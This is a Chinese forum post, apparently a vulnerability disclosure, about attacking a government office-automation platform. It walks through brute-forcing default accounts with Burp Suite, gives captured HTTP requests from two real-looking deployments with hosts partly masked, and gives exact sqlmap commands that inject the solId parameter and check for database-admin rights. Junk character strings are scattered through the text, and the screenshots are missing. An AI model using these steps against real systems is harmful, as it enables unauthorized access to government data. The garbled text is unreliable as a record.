|
1 r1 y7 n8 P" o9 A
# ^2 P4 c& e5 Y
) i) s& Y& k. V0 ^8 k& y' I% C
. g- k: Y0 ?5 ^! O3 s2 X9 i 平台简介:: N% h/ `0 G8 Y% a% a$ a/ S
8 i' q+ t* J* k2 Z
5 g9 T o7 b: @% I. t - R; N. Y' F2 \# H& E
6 ], D& ~- L k8 d- ]
% k1 ?! w5 L. T& a
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 c; P9 l2 @ l; u, `7 U1 j
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! h: a& j& _3 R4 b5 p7 B同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
) \; ~. `* q3 x7 w/ M4 l : ]1 Q+ s/ L9 I! E: b+ I! i
& `' Z( y* [/ C* P t4 \: W
$ F" j: y' \/ x7 V$ z0 c
" `. O1 }: l8 D5 i
3 m/ |5 a; ~0 |9 Z& N5 y! E, T 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 o' e) q+ T; p4 {9 K! V" V : H4 u1 i) w0 P4 ]% }# |2 W( d% p
; C. j# I4 S# ]3 s% j% h8 f7 ]( Z
) f) A5 f- i" q* y8 z7 \0 `1 F; A
; f+ i5 Q3 K* N
$ Z7 J9 F& @! \# u http://1.1.1.1:7197/cap-aco/#(案例2-)
& Z5 w$ W! F& z, J4 x
- w: {4 }& e0 B/ K
3 L) ~& a( ?2 t# s: D7 N! @ http://www.XXOO.com (案例1-官网网站)
% _! K, S" P* Z3 @: I# | & m# ?$ B+ `- e( P
9 p1 {1 m7 i; c- n) z 1 G$ ~. G/ D, @4 t9 @+ T" l
$ e/ l8 ]( G* L; \. B9 Z9 M
! t( F) @5 {' r6 o/ W 漏洞详情:( h9 z# P1 k- q
/ N1 Q' \: X+ J1 X3 S0 x% k0 q8 p7 x
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
; q3 q: M% Z. k) s2 X/ L: n
R7 K+ G2 Z9 ? {, b2 ]1 K* k; c2 b7 L7 d& G
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:, ?8 F* z2 z( {! ?* S
o# _( M0 N% {, ]3 q# V$ J5 k4 D; O) C5 C
) s+ m s+ C! C+ m: v4 O& a + a% y" b8 |. M1 t O6 Q
5 c* u! Y L, x' r! Z1 G# ?3 j 
: |: Z- L# @- Y& t
: {6 g. c/ K: W9 ]0 H
( u4 D! c. |' d status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:6 X3 ?4 L" w* S( \8 ?" J( p; e, n
% w2 h1 i( _% |0 N
9 f6 G( E) P% }; [7 B) @ 1、案例1-官方网站
0 n6 h2 J$ F+ ?, o# Q6 K6 Z3 y4 b / b3 Y X# R- `6 V! ?
7 o( ^, \9 h5 `4 y2 h9 j! O
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
& a2 i4 P; z1 [9 F0 _+ U4 B! |0 D ( f9 P; ]5 p; ~# _0 i
6 h; y9 v. _7 J) o
Host: www.XXOO.com
" L! n4 ^/ M' T& |! C + A/ X: b" B2 e- n
" B3 P! r. t4 h Proxy-Connection: Keep-Alive
- X2 ^" Y! g3 j! P) |0 ~
+ y. ^1 ~& Q: u- E( J8 l# `* M) L3 Z) S
& t1 n- V" `6 M Accept: application/json, text/javascript, */*; q=0.01
2 p* ~/ y5 s; p9 G( X8 l) z ^ C; t3 p( q! C
- {4 q5 V8 T" Z0 p2 w
Accept-Language: zh-CN% H+ v" D3 I$ ^: |/ b* x0 t+ [
/ ]0 W( G" }* j& l
1 h! r4 p: c0 O6 ?
Content-Type: application/json
: P2 a/ u. H: C . m4 z/ J0 t" r" { {* w7 H
/ q; h" ~" S- [9 P User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
c# ~ K, F2 b5 [ T" f
- H6 s: A) ]% c8 V0 W$ H
# l" b: E: M7 Q. J6 I X-Requested-With: XMLHttpRequest# n2 L9 ~* }8 |
- @* u, P3 E- W3 Q: c& i ]" H
9 _# A" I; l6 L9 C! ?" x$ R Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
; ?& L9 p" _3 U( O3 c# E3 r
: y( m% `. I. z' |
& B1 V; a2 n2 a, x* [) `1 k Accept-Encoding: gzip, deflate, sdch
" l' F+ k& l# S+ }" B
7 M" T0 S7 I. B M5 T
$ ?% ^1 v+ b& f Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
1 J) y6 e/ H8 \6 H; b6 L 7 c/ O4 y- |; @* }- C
, d/ C' ^# ~: @# n; Q8 S 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
* o" o* c9 M( Q! j0 A8 Q* ` 0 Z* M' J. p; i
% b. x' s. ^8 `0 T- {+ L: G* x8 }: t
6 Y+ W* w" G Z& r5 Q I
/ M# P, u6 e' b0 y
! F) |6 h- @6 T% G2 d; ]1 g# i 
m; [' K+ _8 q b5 g: M& ~2 S( i: O
5 F! X; h/ Z8 [ t! |
- d' I2 @* ~1 B9 W7 X5 v; M
& _( g" }: @7 Y+ T: _! H2 Q( Q1 d
; P b/ N; ]. @2 ~1 } , |" w6 u4 g: O( {3 `3 a) _8 b
9 ~0 S1 d( x5 B2 l$ Y
2 c5 n5 d4 n9 u8 h8 j7 o3 {* U a: R# X9 [2 A% `2 |& \
+ C- p$ y- J2 C9 O2 P; L" l1 Y
; M" g6 P7 q" _+ @$ U+ v 2、案例2-某天河云平台
/ D6 d7 @( a/ F: J ]
) J; j( i6 X; f' E
) ~; o U. a/ n- U0 z8 K4 l GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1, ]3 }/ u7 q4 c4 s3 b
& P4 c6 p/ J3 k0 _0 k" D5 K2 w& `2 v
Host: 1.1.1.:7197) O. A+ \% Z& g* V" b2 @
: f" S0 r+ x$ q) v
1 d8 m. Z& I5 b2 \* I* m
Accept: application/json, text/javascript, */*; q=0.01* W ]0 v0 m3 L6 n% p
) n7 [$ @- M. d
8 W/ O3 W W- \; N9 [) r X-Requested-With: XMLHttpRequest
4 O; W) W7 O, K6 p$ z0 {9 i4 o
9 q& {, G! Z+ c5 r h# j6 a: W& N/ o2 H& w! j
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
; i) O) K. u9 v: z( ^
) C' y4 [2 @4 \& z* N5 R# U# s. X! ^ K
Content-Type: application/json# Z# J0 K" M/ f0 r$ V( s2 d
0 I* x" k, |( ~
$ S- x" W' v+ t3 q. h+ e4 f Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
7 A" Q6 I; q, R7 U( }2 y, W
! O; y. m7 M3 f/ N1 m0 O. b, z( V
Accept-Language: zh-CN,zh;q=0.8
# s! x$ U5 O- b ] 1 M4 w9 v% J/ X- J8 Z) N1 V
/ Z9 E: P" n( R/ F! F3 N. R Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
" G* x2 z8 t# p0 R7 {
$ ?4 L# A& H. g6 j* V5 o* I9 s& e5 u) D% d
Connection: close C5 x1 {- S( O7 _' M2 V, P
$ U5 ]8 s8 i) z) q4 z! _4 [
+ n) Z* L% h; H 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 w: l8 P, N8 D6 Y $ Z( X2 j6 b! C# T2 L d0 W
8 W: g& X" p3 P 
8 z) J* e& d+ A# w
% @. ]8 s, w6 }; b- k8 r7 `. t1 M# V" \' n$ I- p5 ? z8 |
+ g/ ], N, e6 R @ | 
发表于 2018-10-20 20:15:17
收藏
支持
反对